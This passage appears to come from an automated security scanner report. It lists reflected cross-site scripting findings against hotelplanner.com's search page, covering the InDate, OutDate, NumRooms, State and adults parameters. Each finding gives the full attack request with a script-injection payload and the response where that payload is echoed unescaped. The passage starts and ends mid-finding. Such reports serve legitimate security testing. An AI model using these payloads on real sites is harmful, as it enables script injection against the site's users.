Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:13:05 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:13:05 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228301


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States34479"><script>alert(1)</script>e1b66b11f67&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.257. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the InDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c95"><script>alert(1)</script>e05fe8cdb05 was submitted in the InDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/201183c95"><script>alert(1)</script>e05fe8cdb05&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:30 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:30 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116967


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/201183c95"><script>alert(1)</script>e05fe8cdb05&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.258. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the InDate request parameter is copied into the HTML document as plain text between tags. The payload 76afe<script>alert(1)</script>50d24de7e84 was submitted in the InDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/201176afe<script>alert(1)</script>50d24de7e84&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:31 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116943


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<td align="center" style="FONT-SIZE: 18px;font-weight:bold;FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;">Boston&nbsp;&nbsp;&nbsp;&nbsp;10/04/201176afe<script>alert(1)</script>50d24de7e84 - 10/07/2011</td>
...[SNIP]...
4.259. http://www.hotelplanner.com/Search/Index.cfm [NumRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the NumRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55f79"><script>alert(1)</script>e8ddfbe6e0 was submitted in the NumRooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=155f79"><script>alert(1)</script>e8ddfbe6e0&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:36 GMT;path=/
Vary: Accept-Encoding
Content-Length: 117313


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=155f79"><script>alert(1)</script>e8ddfbe6e0&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.260. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the OutDate request parameter is copied into the HTML document as plain text between tags. The payload 98a59<script>alert(1)</script>9f1d973ec8e was submitted in the OutDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/201198a59<script>alert(1)</script>9f1d973ec8e&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:36 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116944


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<td align="center" style="FONT-SIZE: 18px;font-weight:bold;FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;">Boston&nbsp;&nbsp;&nbsp;&nbsp;10/04/2011 - 10/07/201198a59<script>alert(1)</script>9f1d973ec8e</td>
...[SNIP]...
4.261. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the OutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e15"><script>alert(1)</script>8bc2304a16a was submitted in the OutDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011c9e15"><script>alert(1)</script>8bc2304a16a&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:34 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116968


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011c9e15"><script>alert(1)</script>8bc2304a16a&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.262. http://www.hotelplanner.com/Search/Index.cfm [State parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the State request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d46d"><script>alert(1)</script>a26c259b4ab was submitted in the State parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts1d46d"><script>alert(1)</script>a26c259b4ab&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:53 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:53 GMT;path=/
Vary: Accept-Encoding
Content-Length: 204589


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
nmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts1d46d"><script>alert(1)</script>a26c259b4ab&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.263. http://www.hotelplanner.com/Search/Index.cfm [adults parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the adults request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c52"><script>alert(1)</script>4bf2e57ade7 was submitted in the adults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1d0c52"><script>alert(1)</script>4bf2e57ade7&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate